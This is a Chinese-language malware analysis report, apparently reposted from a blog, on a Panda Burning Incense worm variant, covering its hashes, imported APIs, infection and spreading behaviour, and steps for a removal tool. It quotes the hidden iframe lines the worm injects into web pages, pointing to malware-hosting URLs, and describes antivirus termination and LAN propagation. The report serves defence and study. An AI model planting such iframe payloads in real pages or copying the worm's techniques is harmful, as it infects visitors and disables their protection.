熊貓燒香變種病毒分析分析報告

樣本名2_dump_SCY.exe（熊貓燒香）

作者	yusakul
時間	2018-07-13
平臺	Win7-32

1．樣本概況

1.1 樣本信息

病毒名稱2_dump_SCY.exe

所屬家族	熊貓燒香
樣本名稱	0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768
樣本類型	PE
樣本大小	98816 bytes
MD5值	b8f8e75c9e77743a61bbea9ccbcffd5d
SHA1值	188fc8fc580c0ea4bf8a8900a3d36471823c8923
CRC32	E63D45D3
SHA256	0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768
SSDeep	3072:apAja0pSLwYqK6hVZ7N4bdq4a53YKCOTpc:a2ja0pShqK65ZOq4QYK1m

1.2 病毒行為

設(shè)置注冊表實現(xiàn)自啟動

修改資源管理器（explorer）的文件夾的隱藏屬性

將進程的內(nèi)存屬性修改為可執(zhí)行或可寫

想系統(tǒng)服務(wù)發(fā)送控制碼

刪除服務(wù)

對指定運行的進程感興趣

1.2 測試環(huán)境及工具

工具備注

VMware? Workstation 14 Pro	分析環(huán)境win7_x32
火絨劍	行為監(jiān)控
IDA pro 7.0	靜態(tài)分析
Ollydbg	動態(tài)分析

1.3 分析目標

1.3.1 查看PE文件

1. kernel32.dll文件導(dǎo)入函數(shù)

可以看出導(dǎo)入的這些函數(shù)都是進程、文件相關(guān)的API函數(shù)。

2. Advapi32.dll

Advapi32.dll是一個高級API應(yīng)用程序接口。包括了函數(shù)與對象的安全性，注冊表的操控以及事件日志相關(guān)的API函數(shù)。

這些函數(shù)主要包括三類：注冊表相關(guān)函數(shù)，進程權(quán)限修改函數(shù)，服務(wù)相關(guān)函數(shù)。

3. Mpr.dll

Mpr.dll是windows操作系統(tǒng)網(wǎng)絡(luò)通信相關(guān)模塊。

Wsock.dll windows socket相關(guān)API接口。

WNetAddConnection2A創(chuàng)建一個網(wǎng)絡(luò)資源的鏈接。

URLDownloadToFileA從指定的URL讀取內(nèi)容寫入到文件中。

由上述的導(dǎo)入表分析可知，該病毒程序的主要功能包括：文件讀寫、注冊表修改、進程權(quán)限修改，網(wǎng)絡(luò)鏈接，URL等。

1.3.2 火絨劍監(jiān)控 - 文件操作

1. 創(chuàng)建自我備份在根目錄

2. 創(chuàng)建并釋放隱藏文件Desktop_.ini

3. 自我復(fù)制

1.3.2火絨劍監(jiān)控 - 注冊表操作

1. 無效“顯示所有文件和文件夾”功能

2. 刪除殺毒軟件自啟項

3. 修改文件

使用notepad++查看被修改的文件，被新添加了一行：

<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>

將該網(wǎng)址提交微步在線分析如下

1.3.3 火絨劍監(jiān)控 - 網(wǎng)絡(luò)操作

1. 掃描并嘗試連接局域網(wǎng)腦內(nèi)139、445端口

因為本次分析是在虛擬機封閉分析，所以沒有連接其他主機，猜測此病毒連接成功后，會向其他主機發(fā)送自己，達到傳播目的。

2. 嘗試連接外網(wǎng)IP，并發(fā)送數(shù)據(jù)包

數(shù)據(jù)內(nèi)容如下：

1.3.4火絨劍監(jiān)控 - 進程操作

1. 遍歷系統(tǒng)進程并啟動自釋放文件

2．具體行為分析

2.1 主要行為

2.1.1 惡意程序?qū)τ脩粼斐傻奈：?/h3>

1. 替換程序圖標

2. 隱藏文件

3. 有目錄創(chuàng)建Desktop_.ini文件，內(nèi)容為當前時間（2018-7-11）。

大量用戶軟件被修改，無法正常運行

2.2 惡意代碼分析

2.2.1 惡意代碼樹結(jié)構(gòu)圖

2.2.1 惡意代碼IDA結(jié)構(gòu)圖

兩次對比字符串是否相等，不相等則退出, 驗證完成后有三個主要的惡意行為函數(shù)

2.2.2 主要功能函數(shù)sub_40819C – 復(fù)制

此函數(shù)主要功能為自我復(fù)制到系統(tǒng)目錄并執(zhí)行復(fù)制體。

1．查找系統(tǒng)目錄下是否存在Desktop.ini文件,有則刪除

2．檢測病毒spc0lsv.exe

病毒會通過檢查文件路徑、病毒感染標志來確定進當前病毒屬于以下三種情況的哪一種情況。

分別進程本身屬于原始病毒文件、被感染的可執(zhí)行文件、以及偽裝目標進程三種情況。

（1）原始病毒文件

拷貝自身到
~/system32/driver/目錄，重命名為spc0lsv.exe并運行，然后結(jié)束當前進程。

（2）當前程序時是被感染的可執(zhí)行文件

1）在當前目錄釋放被感染的原始文件

2）刪除系統(tǒng)目錄下spo0lav

3）將創(chuàng)建病毒程序拷貝到系統(tǒng)目錄，并執(zhí)行。

（3）當前運行路徑為系統(tǒng)根目錄，說明當前是在偽裝成系統(tǒng)程序狀態(tài)下運行的，沒有敏感操作。

2.2.3 主要功能函數(shù)sub_40D18C – 感染

此函數(shù)為感染傳播函數(shù)。

該函數(shù)由3個主要函數(shù)，第一個執(zhí)行感染功能，第二個實現(xiàn)自我復(fù)制，第三個局域網(wǎng)傳播自身。

感染文件線程

（1）遍歷文件夾，判斷是否為文件夾，判斷目錄下是否存在Desktop_.ini文件。

判斷是否存在Desktop_.ini

（2）若目錄下存在Desktop_.ini，獲取當前系統(tǒng)時間，對比Desktop_.ini中的時間，是同一天則表示此目錄已被感染，跳過此目錄。

若不同則在此目錄下生成新的Desktop_.ini，寫入本地時間。

（3）刪除GHO備份

（4）感染PE文件 – 感染方式1

將病毒內(nèi)容直接覆蓋到要感染程序，感染目標文件后綴類型有：EXE、SCR、PIF、COM。

f_HackWay1:

（5）感染PE文件 – 感染方式2

網(wǎng)頁感染：感染目標文件后綴類型有：htm, html, asp, php, jsp, aspx。

主要將字符串（<iframe src=http://www.krvkr.com/worm.htm width=0
height=0></iframe>）添加到文件末尾。

f_HackWays:

2. 自我復(fù)制 - 時鐘周期6s

檢索各個磁盤的根目錄是否存在setup.exe和autorun.inf文件，存在則刪除它們。

將自身復(fù)制到 盤符:\setup.exe

遍歷磁盤, 創(chuàng)建“盤符:\autorun.inf”文件。

設(shè)置setup.exe文件屬性為 <系統(tǒng),隱藏>

設(shè)置autorun.inf文件屬性為 <系統(tǒng)，隱藏>，同時將setup.exe設(shè)置為自啟

3. 局域網(wǎng)傳播

2.2.4 主要功能函數(shù)sub_40D088 – 其他

此函數(shù)主要功能為通過修改注冊表實現(xiàn)自我保護，連接網(wǎng)站實現(xiàn)自我更新等功能。

該函數(shù)中設(shè)置了6個時鐘周期，定時執(zhí)行不同的功能。

TimerFunc_1（1s）

（1）提升進程權(quán)限

（2）遍歷窗口名, 向指定窗口名發(fā)送QUIT消息, 并結(jié)束指定進程，大多為殺毒防護軟件。

（3）掃描進程，如果有檢測到以下進程則結(jié)束它，下圖為部分截圖：

（4）修改注冊表，設(shè)置spo0lsv.exe開機啟動，設(shè)置文件（夾）隱藏

TimerFunc_2（1200s）

通過URL地址更新

TimerFunc_3（10s）

（1）通過URL地址更新

（2）刪除網(wǎng)絡(luò)共享：net share ipc$ /del 刪除ipc$共享

（3）關(guān)閉當前時鐘

4. TimerFunc_4（6s）

將殺毒軟件服務(wù)停止，并刪除注冊表啟動項。

TimerFunc_5（10s）

字符串被加密操作過，根據(jù)特征猜測可能是網(wǎng)址，似乎是對一些網(wǎng)址做了操作。

TimerFunc_6（180s）

仍然是從某個網(wǎng)址上下載文件，應(yīng)該不是關(guān)鍵操作。

3．解決方案

3.1 病毒行為

病毒行為1：病毒本身創(chuàng)建了名為“spo01sv.exe”的進程，該進程文件的路徑為“C:\WINDOWS\system32\drivers\spo01sv.exe”。

病毒行為2：在注冊表KCU\Software\Microsoft\Windows\CurrentVersio

n\Run”中創(chuàng)建“svcshare”，用于在開機時啟動位于“C:\WINDOWS\system3

2\drivers\spo0lsv.exe”的病毒程序。

病毒行為3：修改注冊表，使得隱藏文件無法通過普通的設(shè)置進行顯示，該位置為HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Adva

nced\Folder\Hidden\SHOWALL，病毒將CheckedValue的鍵值設(shè)置為了0。

病毒行為4：將自身拷貝到根目錄，并命名為“setup.exe”，同時創(chuàng)建“autorun.inf”用于病毒的啟動，這兩個文件的屬性都是“隱藏”。

病毒行為5：在一些目錄中創(chuàng)建名為“Desktop_.ini”的隱藏文件。

3.2 殺毒工具編寫步驟

3.2.1 終止病毒進程

利用ToolHelpAPI獲得快照句柄,而后再利用Process32First和Process32Next枚舉當前的進程,枚舉的過程當中獲取結(jié)構(gòu)體ProcessEntry32這個結(jié)構(gòu)體里面的相關(guān)信息(包括進程名和進程ID);

找到目標進程之后,利用OpenProcess獲取當前的進程句柄,最后再利用TerminateProcess終止病毒進程.

3.2.2. 刪除文件

調(diào)用函數(shù)Bool DeleteFile (LPCTSTR
lpFilename)，把lpFilename設(shè)為要指向刪除的文件的文件名的指針即可,可以包含具體路徑。

3.2.3 修復(fù)注冊表，刪除啟動啟動項

RegOpenKeyEx()打開目標主鍵,并返回句柄,然后利用RegSetValueEx進行修改鍵值,最后可以利用RegSetValueEx來刪除鍵值,最后利用RegCloseKey來進行關(guān)閉。

3.2.3 查殺工具鏈接

我的GitHub·https://github.com/yusakul/PandaKiller

3.2.4 工具截圖

總結(jié)

以上是生活随笔為你收集整理的熊猫烧香变种病毒分析的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。